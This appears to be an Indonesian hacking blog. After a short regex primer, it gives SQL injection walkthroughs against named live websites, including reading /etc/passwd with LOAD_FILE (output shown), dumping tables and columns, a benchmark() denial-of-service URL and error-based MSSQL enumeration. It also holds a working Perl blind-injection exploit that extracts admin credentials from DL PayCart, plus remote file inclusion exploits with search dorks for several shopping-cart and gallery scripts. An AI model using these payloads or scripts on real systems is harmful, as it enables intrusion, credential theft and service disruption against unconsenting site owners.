Belajar regular expression

Belajar sedikit tengang regular expression


----------
Assertion
----------
^ = awal kata
$ = ahkir kata
\b = batas kata
\B = batas non kata

-----
Atom
-----
. = sembarang karakter kecuali newline
[] = salah satu karakter yang di dalam kurung
[^ ] = bukan salah satu karakter yang di dalam kurung
| = kemunkinan dari suatu string
() = sembarang regular experssion yang cocok

----------
Quantifier
----------
* = nol atau lebih instan atom
+ = satu atau lebih instan dari atom
? = nol atau satu instan dari atom
{n} = n instan dari atom
{n,} = sedikitanya n instan dari atom
{n,m} = sedikinya n dan paling banyak m
n-m = n sampai m


------------------------
Symbol / karakter khusus
------------------------
\d = sembarang digit
\D = sembarang non digit
\n = newline
\r = carriage return
\t = tab
\f = formfeed
\s = karakter white space
\S = karakter non white space
\w = alfanumerik
\W = karakter non alfanumerik


Kita coba penarapanya dalam perl dan php

perl

#!/usr/sbin/perl
$url = "http://www.irvian.cn";
if ($url =~ /^http:\/\/www\.(.+)$/i){print $1;}
else{ die "wrong\n";}

hasilnya dari program diatas yaitu irvian.cn


php

$url = "http://www.irvian.cn";
if(@eregi("^http:\/\/www\.(.+)$", $url, $hasil)){
echo $hasil[1];}


hasilnya sama yaitu irvian.cn

Read more...

Sql injection LOAD_FILE

kali ini saya mencoba mengunakan LOAD_FILE pada sql injection untuk melihat file file sesitif.


victim:

http://sonyadakar.com


vuln:
http://sonyadakar.com/products1/content.php?id=-1[sql]

seperti biasa cari jumlah kolomnya sampai true.

(browser sudah tidak mengeluarkan error lagi)


%20union%20select%201,2/*

%20union%20select%201,2,3/*

dst.. sampai

%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*

http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*

setelah itu kita ganti angka yang keluar dengan LOAD_FILE.


formatnya adalah LOAD_FILE(/etc/passwd) dimana /etc/passwd adalah patch file yang mau kita lihat


tetapi sebelumnya /etc/passwd harus di rubah ke bentuk hex terlebih dahulu


hex dari /etc/passwd adalah 0x2f6574632f706173737764.


kita juga bisa menganti dengan file lain misal /etc/issue dan ubah ke bentuk hex.


hex dari /etc/issue adalah 0x2F6574632F6973737565.


Setelah merubah file yang kita ingin lihat ke bentuk hex, mari kita lanjutkan dengan memasukannya ke dalam url


http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12/*

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
----------------cut-------------------------------

ups.. terlihat kan isi filenya ;D

kita coba dengan memasukan LOAD_FILE(0x2F6574632F6973737565) ke dalam url

http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2F6574632F6973737565),3,4,5,6,7,8,9,10,11,12/*

Red Hat Enterprise Linux ES release 4 (Nahant Update 6)
Kernel \r on an \m

Read more...

Mencari tabel dan kolom di target mysql

SQL Injection Mencari tabel dan kolom di target mysql.

Catatan cara ini dapat berhasil jika versi mysql 5 keatas dan information_schema dapat di baca (tidak access denied).

kali ini kita akan ber ekploidtasi pada target
http://www.cpme.be


vuln:
http://www.cpme.be/content.php?c=1[sql]


cari jumlah kolomnya sampai true.

SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,2,3,4/*

ok true kita coba untuk mencari nama tabel.




SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1/*

Dengan sql diatas kita dapat menemukan tabel ke 1 yaitu agenda_international.




kita coba cari tabel ke 2



SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%202,1/*

Dengan sql diatas kita dapat menemukan tabel ke 2 yaitu answers

kita dapat mecari tabel ke 3 dst nya dengan menambah angaka di depan limit.



ok setelah dapat tabel mungkin kita akan bertanya bagaimana mencari kolom?

SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,COLUMN_NAME,3,4%20from%20information_schema.COLUMNS%20where%20table_name='forum_users'%20and%20table_schema=database()limit%201,1/*

dengan sql diatas kita dapat menemukan kolom 1 pada tabel forum_users yaitu username.

dengan menambah angka di depan limit kita dapat menemukan kolom ke 2 dst.



jika anda merasa lelah itu wajar saja :D lalu adakah cara yang praktis?

sekali lagi saya membuat sebuah tools yang praktis. silahkan anda coba di


http://209.40.202.204/~irvian/ask.php

Read more...

DOS dengan benchmark sql injection

Kali ini terdapat sebuah bug sql injection di site astro-nusantara.com.

vuln:
www.astro-nusantara.com/pages/programme.php?channel_id=21[sql]

Dos benchmark:
http://www.astro-nusantara.com/pages/programme.php?channel_id=21%20and%20benchmark(10000000000000000000,md5(199))/*

Read more...

Bermain Sql Injection di target cfm

Kali ini kita coba dengan bermain sql injection pada target .cfm

sample target:
http://www.ekklaw.com/ekklaw.cfm?ID=[sql]

tes vuln:
http://www.ekklaw.com/ekklaw.cfm?ID=7'

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ''.

Jika kita menemukan error seperti di atas berarti kita sudah menemukan 2 kesimpulan.
1. target adalah windows.
2. target mengunakan databases sql server.

Ok, mari kita lanjutkan.


masukan sql injection berikut ini
http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN('')))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value
'REFERENTIAL_CONSTRAINTS' to a column of data type int.


terlihat browser mengeluarkan error yang sangat menakjubkan ;D
dari error di atas kita menemukan sebuah tabel yaitu REFERENTIAL_CONSTRAINTS

lalu bagaimana kita mencari tabel ke 2 dstnya?

kita coba dengan sql berikut:
http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN('REFERENTIAL_CONSTRAINTS')))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'REFERENTIAL_CONSTRAINTS'.

di sini dapat kita lihat bahwa table REFERENTIAL_CONSTRAINTS tidak di temukan. Kenapa?

jawabnya adalah karena REFERENTIAL_CONSTRAINTS string dan server hanya mebaca tabel dalam bentuk ascii.

lalu bagai mana caranya supaya server dapat membaca tabel REFERENTIAL_CONSTRAINTS?

mudah kita convert saja REFERENTIAL_CONSTRAINTS dari string ke ascii

seperti berikut ini:

char(82)%2bchar(69)%2bchar(70)%2bchar(69)%2bchar(82)%2bchar(69)%2bchar(78)%2bchar(84)%2bchar(73)%2bchar(65)%2bchar(76)%2bchar(95)%2bchar(67)%2bchar(79)%2bchar(78)%2bchar(83)%2bchar(84)%2bchar(82)%2bchar(65)%2bchar(73)%2bchar(78)%2bchar(84)%2bchar(83)

ascii diatas jika di string kan adalah REFERENTIAL_CONSTRAINTS.

Mari kita coba dengan memasukan ascii di atas ke dalam sql injection.

http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.
TABLES%20WHERE%20TABLE_NAME%20NOT%20IN(char(82)%2bchar(69)%2bchar(70)%2bchar(69)%2bchar(82)%2bchar(69)%2bchar(78)%2bchar(84)%2bchar(73)%2bchar(65)%2bchar(76)%2bchar(95)%2bchar(67)%2bchar(79)%2bchar(78)%2bchar(83)%2bchar(84)%2bchar(82)%2bchar(65)%2bchar(73)%2bchar(78)%2bchar(84)%2bchar(83))))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'articles' to a column of data type int.

wow dapat tabel ke 2 selanjutnya anda lanjutkan saja dengan menambah tabel articles yang sudah di konversi ke ascii ke dalam sql injection.

Jika anda berkata lelah itu sudah pasti tapi saya sudah membuat tools mengunakan language perl yang dapat mempermudah anda.

Dengan tools ini ada bisa bermain dengan cfm menjadi sangat mudah.

jika anda sangat membutuhkan tools ini silahkan hubungi irvian.info@gmail.com.

Read more...

DL PayCart 1.01 Blind Sql Injection

#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - © 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
#---------------------------------------------------------------------------------

if (@ARGV < 3){
die "
use : $0 host option itemid
example : $0 http://victim.com 1 1

1= AdminID
2= AdminPass\n";}


$url = $ARGV[0];
$option = $ARGV[1];
$itmid = $ARGV[2];


print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]DL PayCart 1.01 - © 2006 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";

if ($option eq 1){
syswrite(STDOUT, "AdminID: ", 9);}
elsif ($option eq 2){
syswrite(STDOUT, "AdminPass: ", 11);}

for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 255)
{
if(&blind($url, $option, $i, $n, $itmid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}

print "\n[+]finish Execution Exploit\n";



sub blind {
my $site = $_[0];
my $op = $_[1];
my $az = $_[2];
my $na = $_[3];
my $itm = $_[4];

if ($op eq 1){$klm = "AdminID";}
elsif ($op eq 2){$klm = "AdminPass";}

$blind = "$site"."/viewitem.php?ItemID=".$itm."'/**/and/**/substring((select/**/"."$klm"."/**/from/**/pc_settings/**/limit/**/0,1),"."$az".",1)=char("."$na".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;

if ($res !~ /noimage.gif/i){
return 1;
}

}
Read more...

Pixaria Gallery 1.x RFI

Pixaria Gallery v1.x.x (class.Smarty.php) Remote File Include Vulnerability

---------------------------------------------
# scripts : Pixaria Gallery v1.x.x
# Discovered By : irvian
# scripts site : http://pixaria.com
# dork : inurl:index.gallery.php?gid=
----------------------------------------------

bug found:

/resources/includes/class.Smarty.php

// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");

Exploit:
/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
Read more...

PhotoCart 3.9 RFI

-------------------------------------------------------------------
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Dork : inurl :/PhotoCart/
# Bug Found By : irvian
--------------------------------------------------------------------
bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
adminsessionCheck();


www.target.com/adminprint.php?admin_folder=[evil_scripts]
www.target.com/adminprint.php?path=[evil_scripts]
Read more...

Jshop Server 1.3 RFI

--------------------------------------------------------------------------
# scripts : Jshop Server 1.3
# Discovered By : irvian
# scripts site : http://www.jshop.co.uk/
# dork : inurl:page.php?xPage=
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

Read more...

Sunshop 3.5 RFI

sunshop 3.5 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts : SunShop v3.5
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# dork : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

index.php
$abs_path = dirname(__FILE__);
include $abs_path."/global.php";

checkout.php
$abs_path = dirname(__FILE__);
include $abs_path."/global.php";

Exploit:
target.com/index.php?abs_path=[evilcode]
target.com/checkout.php?abs_path=[evilcode]

Read more...

CS-Cart 1.3.3 RFI

CS-Cart 1.3.3 Remote File include sesion II

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
$$ Script site: http://www.cs-cart.com
$$ Dork: Powered by CS-Cart - Shopping Cart Software
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$ Find by: irvian
$$ Contact: admin@irvian.info
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

$install_dir = dirname(__FILE__);
$install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins';
include $install_dir.'/core/install.php'

Expl: http://site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts] Read more...